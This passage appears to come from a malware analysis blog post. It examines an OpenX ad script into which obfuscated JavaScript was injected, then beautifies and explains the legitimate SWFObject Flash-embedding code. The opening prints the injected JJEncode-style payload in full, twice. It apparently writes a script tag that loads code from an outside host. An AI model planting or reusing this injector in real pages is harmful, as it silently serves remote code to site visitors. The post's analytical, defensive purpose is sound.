.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\
"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"/div>\n";
OX_0f4f918e += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); } else { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";
OX_0f4f918e += "// ]]> --><"+"/script><"+"noscript><"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/noscript><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_
$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\
"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
document.write(OX_0f4f918e);
...well, isn't that ugly? Let's see if we can gussy it up a bit.
JSBeautifier to the rescue! One pass adds some formatting to the code and makes it much easier to read. Let's see if we can't make some sense out of it now – we'll take it step by step.
Step 2: Initial Analysis
This first bit just makes sure the nested namespace objects exist, the last of them named "org.openx.SWFObjectUtil", for the script to use:
// Create each level of the org.openx namespace only if it is not already there, so a
// copy of the library loaded earlier on the page is not clobbered. `org` itself must stay
// a hoisted `var` declaration: `typeof` on an undeclared name is the only safe probe.
if (typeof org === "undefined") { var org = {}; }
if (typeof org.openx === "undefined") { org.openx = {}; }
if (typeof org.openx.util === "undefined") { org.openx.util = {}; }
if (typeof org.openx.SWFObjectUtil === "undefined") { org.openx.SWFObjectUtil = {}; }
Next, it attaches a constructor, org.openx.SWFObject, to that namespace. It looks like this will detect whether or not Flash is installed, check its version, and trigger an install under certain conditions:
/**
 * Constructor for the OpenX-branded SWFObject Flash-embedding helper found in the sample.
 * Every positional argument is stored through setAttribute()/addParam() and later
 * concatenated, unescaped, into the <embed>/<object> markup built by getSWFHTML(),
 * which write() assigns to a container's innerHTML.
 *
 * @param {string} _1 URL of the SWF to embed (the "swf" attribute).
 * @param {string} id  id/name given to the embed element.
 * @param {string|number} w  width of the embed.
 * @param {string|number} h  height of the embed.
 * @param {string|number} _5 minimum player version, parsed as a dotted string ("9", "6.0.65").
 * @param {string} c   background colour (the "bgcolor" param).
 * @param {string} _7  "quality" param; defaults to "high".
 * @param {string} _8  URL handed to the express installer as MMredirectURL; defaults to window.location.
 * @param {string} _9  URL the page is replaced with when the installed player is older than _5.
 * @param {string} _a  query-string key that bypasses version detection; defaults to "detectflash".
 */
org.openx.SWFObject = function(_1, id, w, h, _5, c, _7, _8, _9, _a) {
// Silently do nothing on browsers that lack document.getElementById.
if (!document.getElementById) {
return;
}
// skipDetect holds the value of the ?detectflash=... request parameter; write() treats
// a truthy value as permission to embed the SWF without checking the player version.
this.DETECT_KEY = _a ? _a : "detectflash";
this.skipDetect = org.openx.util.getRequestParameter(this.DETECT_KEY);
this.params = new Object();
this.variables = new Object();
// An Array used as a string-keyed map (see setAttribute/getAttribute).
this.attributes = new Array();
if (_1) {
this.setAttribute("swf", _1);
}
if (id) {
this.setAttribute("id", id);
}
if (w) {
this.setAttribute("width", w);
}
if (h) {
this.setAttribute("height", h);
}
// Required version: "6.0.65" -> PlayerVersion{major:6, minor:0, rev:65}.
if (_5) {
this.setAttribute("version", new org.openx.PlayerVersion(_5.toString().split(".")));
}
this.installedVer = org.openx.SWFObjectUtil.getPlayerVersion();
// document.all without window.opera is the classic IE sniff. With player > 7 the bottom
// of the minified bundle uses this flag to hook onbeforeunload and run cleanupSWFs.
if (!window.opera && document.all && this.installedVer.major > 7) {
org.openx.SWFObject.doPrepUnload = true;
}
if (c) {
this.addParam("bgcolor", c);
}
var q = _7 ? _7 : "high";
this.addParam("quality", q);
// Express-install is off until useExpressInstall() is called; doExpressInstall is
// flipped by write() when the installed player is too old.
this.setAttribute("useExpressInstall", false);
this.setAttribute("doExpressInstall", false);
var _c = (_8) ? _8 : window.location;
this.setAttribute("xiRedirectUrl", _c);
// Empty string means "do not redirect" when the version check fails.
this.setAttribute("redirectUrl", "");
if (_9) {
this.setAttribute("redirectUrl", _9);
}
};
Next we have a code block that sets the object's prototype to add more functionality to it. In this case, it seems to be doing some browser checks to determine the right HTML to output so the browser renders a Flash file:
org.openx.SWFObject.prototype = {
useExpressInstall: function(path) {
  // Remember where the express-install SWF lives (default name when none is given)
  // and flag that write() may fall back to it.
  if (path) {
    this.xiSWFPath = path;
  } else {
    this.xiSWFPath = "expressinstall.swf";
  }
  this.setAttribute("useExpressInstall", true);
},
setAttribute: function(name, value) {
  // Store an embed attribute; `attributes` is an Array used as a string-keyed map.
  // The value is later interpolated into HTML as-is, without escaping.
  this.attributes[name] = value;
},
getAttribute: function(name) {
  // Look up an embed attribute; yields undefined for anything never set.
  return this.attributes[name];
},
addParam: function(name, value) {
  // Record a player param (quality, bgcolor, allowScriptAccess, ...). Params become
  // bare <embed> attributes or <object><param> children in getSWFHTML().
  this.params[name] = value;
},
getParams: function() {
  // Hand back the live params object, not a copy.
  return this.params;
},
addVariable: function(name, value) {
  // Record a flashvar; getVariablePairs() serialises these as name=value.
  this.variables[name] = value;
},
getVariable: function(name) {
  // Read back a single flashvar; undefined when it was never added.
  return this.variables[name];
},
getVariables: function() {
  // Hand back the live flashvars object, not a copy.
  return this.variables;
},
getVariablePairs: function() {
  // Serialise every flashvar as "name=value". Neither side is URL-encoded, and the
  // for-in walk also picks up any enumerable inherited property.
  var vars = this.getVariables();
  var pairs = [];
  for (var name in vars) {
    pairs.push(name + "=" + vars[name]);
  }
  return pairs;
},
/**
 * Builds the markup that embeds the SWF: an <embed> tag when the browser exposes
 * navigator.plugins/mimeTypes, otherwise an IE-style <object> with <param> children.
 * Attribute, param and flashvar values are concatenated in as-is — nothing is HTML- or
 * URL-escaped — and write() injects the result via innerHTML, so whatever reached the
 * constructor, addParam() or addVariable() lands in the DOM verbatim. In this sample
 * that includes allowScriptAccess=always, which grants the embedded SWF script access
 * to the hosting page.
 *
 * @returns {string} the <embed .../> or <object>...</object> HTML.
 */
getSWFHTML: function() {
var _19 = "";
// Netscape-style plugin API available: emit an <embed> tag.
if (navigator.plugins && navigator.mimeTypes && navigator.mimeTypes.length) {
// Express-install mode swaps the movie for the installer SWF and tells it the player type.
if (this.getAttribute("doExpressInstall")) {
this.addVariable("MMplayerType", "PlugIn");
this.setAttribute("swf", this.xiSWFPath);
}
// Nothing visible ever sets a "style" attribute, so this presumably renders style="undefined".
_19 = "<embed type=\"application/x-shockwave-flash\" src=\"" + this.getAttribute("swf") + "\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\"";
_19 += " id=\"" + this.getAttribute("id") + "\" name=\"" + this.getAttribute("id") + "\" ";
var _1a = this.getParams();
// Each param becomes a bare attribute; [key] is a one-element array that stringifies to the key.
for (var key in _1a) {
_19 += [key] + "=\"" + _1a[key] + "\" ";
}
// flashvars are joined with "&" and not encoded.
var _1c = this.getVariablePairs().join("&");
if (_1c.length > 0) {
_19 += "flashvars=\"" + _1c + "\"";
}
_19 += "/>";
} else {
// No plugin API: assume the Flash ActiveX control and emit <object>/<param> markup.
if (this.getAttribute("doExpressInstall")) {
this.addVariable("MMplayerType", "ActiveX");
this.setAttribute("swf", this.xiSWFPath);
}
// The classid is the Flash Player ActiveX control's CLSID.
_19 = "<object id=\"" + this.getAttribute("id") + "\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\">";
_19 += "<param name=\"movie\" value=\"" + this.getAttribute("swf") + "\" />";
var _1d = this.getParams();
// `key` is re-declared with var; it is the same hoisted function-scope variable as above.
for (var key in _1d) {
_19 += "<param name=\"" + key + "\" value=\"" + _1d[key] + "\" />";
}
var _1f = this.getVariablePairs().join("&");
if (_1f.length > 0) {
_19 += "<param name=\"flashvars\" value=\"" + _1f + "\" />";
}
_19 += "</object>";
}
return _19;
},
write: function(_20) {
if (this.getAttribute("useExpressInstall")) {
var _21 = new org.openx.PlayerVersion([6, 0, 65]);
if (this.installedVer.versionIsValid(_21) && !this.installedVer.versionIsValid(this.getAttribute("version"))) {
this.setAttribute("doExpressInstall", true);
this.addVariable("MMredirectURL", escape(this.getAttribute("xiRedirectUrl")));
document.title = document.title.slice(0, 47) + " - Flash Player Installation";
this.addVariable("MMdoctitle", document.title);
}
}
if (this.skipDetect || this.getAttribute("doExpressInstall") || this.installedVer.versionIsValid(this.getAttribute("version"))) {
var n = (typeof _20 == "string") ? document.getElementById(_20) : _20;
n.innerHTML = this.getSWFHTML();
return true;
} else {
if (this.getAttribute("redirectUrl") != "") {
document.location.replace(this.getAttribute("redirectUrl"));
}
}
return false;
}
};
These parts handle Flash Player version detection. The plugin path parses navigator.plugins["Shockwave Flash"].description; the IE path instantiates the ShockwaveFlash ActiveX control (trying 7, then 6, then an unversioned ProgID) and reads its $version. Note that on the Flash 6 path it also sets AllowScriptAccess = "always" on the control – the property that decides whether the movie is allowed to script the hosting page:
org.openx.SWFObjectUtil.getPlayerVersion = function() {
// Detect the installed Flash Player version. Returns a PlayerVersion;
// 0.0.0 means nothing usable was found.
var _23 = new org.openx.PlayerVersion([0, 0, 0]);
if (navigator.plugins && navigator.mimeTypes.length) {
// Netscape-style plugin API: strip the leading words from the plugin's
// description, turn the " r<rev>" / " b<build>" suffix into a dot and
// split on dots (so a description like "Shockwave Flash 9.0 r115"
// becomes ["9", "0", "115"]).
var x = navigator.plugins["Shockwave Flash"];
if (x && x.description) {
_23 = new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split("."));
}
} else {
if (navigator.userAgent && navigator.userAgent.indexOf("Windows CE") >= 0) {
// Windows CE: probe versioned ProgIDs upward (.4, .5, ...) until one
// fails to instantiate; the last one that succeeded is the major
// version. axo is always null when the loop exits.
var axo = 1;
var _26 = 3;
while (axo) {
try {
_26++;
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash." + _26);
_23 = new org.openx.PlayerVersion([_26, 0, 0]);
} catch (e) {
axo = null;
}
}
} else {
// Desktop IE: try the 7.x control, fall back to 6.x, then to an
// unversioned ProgID.
try {
var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
} catch (e) {
try {
var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_23 = new org.openx.PlayerVersion([6, 0, 21]);
// Security-relevant: AllowScriptAccess governs whether the movie may
// script the hosting page, and it is forced to "always" for the 6.x
// control here.
axo.AllowScriptAccess = "always";
} catch (e) {
// major == 6 is only possible if the 6.x control was created and the
// AllowScriptAccess assignment above then threw.
if (_23.major == 6) {
return _23;
}
}
try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
} catch (e) {}
}
if (axo != null) {
// Only reached on the desktop path. "$version" is expected to look like
// "<platform> <major>,<minor>,<rev>,...": drop the platform token and
// split the rest on commas.
_23 = new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));
}
}
}
return _23;
};
org.openx.PlayerVersion = function(_29) {
// Three-part Flash version (major.minor.rev) built from an array of
// strings or numbers; components that are null/undefined default to 0.
// parseInt is deliberately left radix-less, matching the original library.
var part = function(raw) {
return raw != null ? parseInt(raw) : 0;
};
this.major = part(_29[0]);
this.minor = part(_29[1]);
this.rev = part(_29[2]);
};
org.openx.PlayerVersion.prototype.versionIsValid = function(fv) {
// True when this version is >= fv. Fields are compared in order
// (major, minor, rev) and the first one that differs decides; equal
// versions are valid. fv must itself be a PlayerVersion.
var fields = ["major", "minor", "rev"];
for (var i = 0; i < fields.length; i++) {
var mine = this[fields[i]];
var wanted = fv[fields[i]];
if (mine < wanted) {
return false;
}
if (mine > wanted) {
return true;
}
}
return true;
};
Next we have a utility function that reads name=value parameters out of the URL (the query string, or the hash fragment when there is no query string) and returns the value verbatim, without URL-decoding. This is how the library accepts external input – the constructor uses it to read the detectflash parameter, which lets a crafted URL bypass version detection entirely:
org.openx.util = {
// Look a name=value pair up in the URL. The source is the query string,
// or the fragment when there is no query string; the value comes back
// exactly as it appears in the URL (no decoding). With no name the whole
// query/fragment string is returned; a missing parameter yields "".
getRequestParameter: function(_2b) {
var source = document.location.search || document.location.hash;
if (_2b == null) {
return source;
}
if (!source) {
return "";
}
var pairs = source.substring(1).split("&");
for (var idx = 0; idx < pairs.length; idx++) {
var pair = pairs[idx];
var eq = pair.indexOf("=");
if (pair.substring(0, eq) == _2b) {
return pair.substring(eq + 1);
}
}
return "";
}
};
A couple of cleanup functions follow. Despite appearances this is not the script removing itself: on page unload it hides every OBJECT element and replaces each of their methods with a no-op, the standard SWFObject workaround for Internet Explorer's Flash unload problems (it is only wired up when the constructor detected IE with a Flash player newer than 7):
org.openx.SWFObjectUtil.cleanupSWFs = function() {
// Hide every OBJECT element in the document and replace each of its
// function-valued properties with a no-op. The collection is walked
// backwards, last element first.
var objects = document.getElementsByTagName("OBJECT");
var idx = objects.length;
while (idx--) {
var el = objects[idx];
el.style.display = "none";
for (var prop in el) {
if (typeof el[prop] == "function") {
el[prop] = function() {};
}
}
}
};
// doPrepUnload is set by the constructor for IE (document.all, not Opera)
// with a Flash player newer than 7. Installs the unload cleanup once.
if (org.openx.SWFObject.doPrepUnload) {
if (!org.openx.unloadSet) {
org.openx.SWFObjectUtil.prepUnload = function() {
// Assigned without var: these create/overwrite globals, stubbing out
// the unload handlers the Flash player itself installs.
__flash_unloadHandler = function() {};
__flash_savedUnloadHandler = function() {};
window.attachEvent("onunload", org.openx.SWFObjectUtil.cleanupSWFs);
};
// attachEvent is the IE-only event API, consistent with the guard above.
window.attachEvent("onbeforeunload", org.openx.SWFObjectUtil.prepUnload);
org.openx.unloadSet = true;
}
}
Following that, we find a function that adds support for getElementById if it isn't natively supported by the browser:
// Polyfill for very old IE: when getElementById is missing but the
// proprietary document.all collection exists, map one onto the other.
if (document.all && !document.getElementById) {
document.getElementById = function(id) {
return document.all[id];
};
}
Up to this point, everything has been pretty straightforward – it appears we have javascript code that embeds a Flash object that is tailored to the browser and version of Flash installed. This could be legitimate or malicious depending on how it is used – it could just be code for Flash-based ads.
